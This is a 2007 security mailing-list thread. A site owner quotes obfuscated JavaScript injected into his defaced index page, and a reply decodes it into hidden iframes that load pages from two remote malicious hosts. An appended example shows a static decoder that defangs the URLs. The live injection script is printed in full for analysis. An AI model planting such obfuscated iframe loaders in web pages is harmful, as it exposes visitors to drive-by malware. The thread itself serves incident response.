[Dshield] Need help decoding hackers javascript code

Security security at hudakville.com
Tue Sep 4 18:12:33 GMT 2007


Steve,

  The document.write part is UTF-8 Hex Encoding which, in this case,
is really just the hex representation of the ASCII letters.  It
decodes to:

<iframe src="h t t p://zlo-x.net/XDS/iframe.php" width=0 height=0
border=0></iframe>

(with the http intact).

The Decode javascript function decodes to:

<iframe width=1 height=1 border=0 frameborder=0 src='h t t
p://bensax.info/index2.html'></iframe>

(with the http intact once again).

Both of these sites lead to other JS encoded pages which lead to
further nastiness.


Tyler

Steve West wrote:
> Hi,
> 
> Just found some hackers who have replaced the index.html with the 
> following code below. I'm wondering if anyone knows of a tool I can use 
> to safely decode the following:
> 
> <meta name="robots" content="all" /><SCRIPT LANGUAGE="JavaScript">
> <!--
> function Decode(){var temp="",i,c=0,out="";var 
> str="60!105!102!114!97!109!101!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!98!111!114!100!101!114!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!114!99!61!39!104!116!116!112!58!47!47!98!101!110!115!97!120!46!105!110!102!111!47!105!110!100!101!120!50!46!104!116!109!108!39!62!60!47!105!102!114!97!109!101!62!13!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
> //-->
> </SCRIPT><SCRIPT LANGUAGE="JavaScript">
> <!--
> Decode();
> //-->
> </SCRIPT>
> <meta name="revisit-after" content="1 days" /><script 
> type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u007a\u006c\u006f\u002d\u0078\u002e\u006e\u0065\u0074\u002f\u0058\u0044\u0053\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
> 
> --
> thx,
> 
> SW
> 
> 
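An added example, not part of the original thread: one way to decode both encodings discussed above as plain text under Node.js, without ever evaluating the suspect script. The function names and the sample input (with placeholder hosts a.example and b.example) are constructed for illustration.

```javascript
// Static decoder: the suspect page is handled purely as a string. Nothing in it
// is eval'd, written to a DOM, or fetched.

// Scheme 1: runs of decimal character codes separated by "!" (the Decode() function).
function decodeBangDelimited(source) {
  const runs = source.match(/(?:\d{1,3}!){4,}/g) || [];
  return runs.map(run =>
    run.split('!').filter(Boolean).map(n => String.fromCharCode(Number(n))).join(''));
}

// Scheme 2: runs of \uXXXX escapes (the document.write argument).
function decodeUnicodeEscapes(source) {
  const runs = source.match(/(?:\\u[0-9a-fA-F]{4}){4,}/g) || [];
  return runs.map(run =>
    run.replace(/\\u([0-9a-fA-F]{4})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16))));
}

// Defang decoded URLs so the result can be mailed or logged without being clickable.
function defang(text) {
  return text.replace(/https?:\/\/[^\s'"<>]+/gi, url =>
    url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]'));
}

// Run both decoders over the raw page source and return defanged results.
function analyze(source) {
  return [...decodeBangDelimited(source), ...decodeUnicodeEscapes(source)]
    .map(decoded => defang(decoded.trim()));
}

// Constructed sample in the same two encodings; String.raw keeps the \u escapes literal,
// as they would be when the page source is read from disk.
const SAMPLE = String.raw`<script>var str="60!97!32!104!114!101!102!61!39!104!116!116!112!58!47!47!97!46!101!120!97!109!112!108!101!47!39!62!";</script>
<script>document.write('\u003c\u0062\u003e\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0062\u002e\u0065\u0078\u0061\u006d\u0070\u006c\u0065\u003c\u002f\u0062\u003e')</script>`;

for (const line of analyze(SAMPLE)) console.log(line);
```

To use it on a real sample, read the saved page with fs.readFileSync(path, 'utf8') and pass the string to analyze().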

